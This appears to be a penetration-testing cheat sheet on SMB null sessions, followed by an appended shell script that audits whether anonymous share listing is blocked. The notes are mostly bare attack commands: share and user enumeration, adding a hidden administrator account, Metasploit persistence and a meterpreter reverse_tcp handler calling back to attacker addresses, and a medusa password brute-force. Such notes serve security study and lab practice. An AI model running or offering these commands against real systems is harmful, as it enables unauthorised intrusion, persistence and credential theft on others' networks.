SMB and null sessions

Windows:

nbtstat -A ip

net view ip

Linux:

nmblookup -A ip

smbclient -L //192.168.1.1 -N

smbclient also lists the administrative shares that standard Windows tools such as net view hide.

Null sessions are a piece of Windows hacking history.

Check for null session attack:

Verify and exploit via the IPC$ administrative share (try to connect without valid creds):

Windows:

net use \\<target ip>\IPC$ "" /u:""

Linux:

smbclient //ip/IPC$ -N

enum -S ip (enum shares)

enum -U ip (enum users)

enum -P ip (check pass policy)

enum4linux

Checking the password policy before running an authentication attack lets you fine-tune the attack tool to:

- prevent account lockouts
- prevent false positives
- choose a dictionary or adjust the bruteforcer configuration

net user admin pass /add

net localgroup administrators admin /add

xfreerdp /u:"admin" /v:10.2.29.226:3389

run persistence -U -i 5 -p 443 -r 10.10.11.3

background

use exploit/windows/local/persistence_service

show options

set SESSION 1

exploit

exploit/multi/handler

background

sessions -K

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 10.10.15.2

set LPORT 4444

exploit

/root/Desktop/wordlists/100-common-passwords.txt

smbmap -u guest -d EVILCORP -H 192.166.155.3

medusa -M smbnt -h 192.166.155.3 -u william -P /root/Desktop/wordlists/100-common-passwords.txt

Enumerate shares (to find hidden shares):

enum4linux -s ~/Desktop/wordlists/100-common-passwords.txt demo.host.local
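Added example, not part of the original notes: a POSIX shell helper that ties the null-session check and the hidden-share enumeration above together for an audit. parse_shares parses smbclient -L output (demonstrated offline on a constructed sample); audit_host, which assumes smbclient is installed, runs the anonymous listing against one host so an administrator can confirm that null sessions are blocked and that administrative shares are not exposed anonymously.

```shell
#!/bin/sh
# Audit helper for null sessions and hidden shares (added example, not
# from the original notes). Requires only sh, awk and, for audit_host, smbclient.

# Print "name type visibility" for every share in an "smbclient -L" listing
# read from stdin. Names ending in $ are hidden from "net view" but are
# still listed by smbclient.
parse_shares() {
    awk '
        /^[[:space:]]*-+[[:space:]]+-+/ { in_table = 1; next }   # header underline
        in_table && NF == 0 { in_table = 0 }                     # blank line ends table
        in_table && ($2 == "Disk" || $2 == "IPC" || $2 == "Printer") {
            vis = (substr($1, length($1)) == "$") ? "hidden" : "visible"
            print $1, $2, vis
        }
    '
}

# Count hidden (administrative) shares in a listing read from stdin.
count_hidden() {
    parse_shares | awk '$3 == "hidden" { n++ } END { print n + 0 }'
}

# Check one host: does it answer an anonymous (-N) share listing at all,
# and if so, which shares are exposed. Assumes smbclient is on PATH.
audit_host() {
    host="$1"
    out=$(smbclient -L "//$host" -N 2>/dev/null || true)
    if printf '%s\n' "$out" | grep -q 'Sharename'; then
        echo "$host: anonymous share listing ALLOWED ($(printf '%s\n' "$out" | count_hidden) hidden shares)"
        printf '%s\n' "$out" | parse_shares | sed 's/^/  /'
    else
        echo "$host: anonymous share listing denied (null session blocked or host unreachable)"
    fi
}

# Constructed sample of "smbclient -L //host -N" output for a local dry run.
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
'
```

Run `printf '%s\n' "$SAMPLE_LISTING" | parse_shares` for the dry run, or `audit_host <ip>` against a host you are authorised to test.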
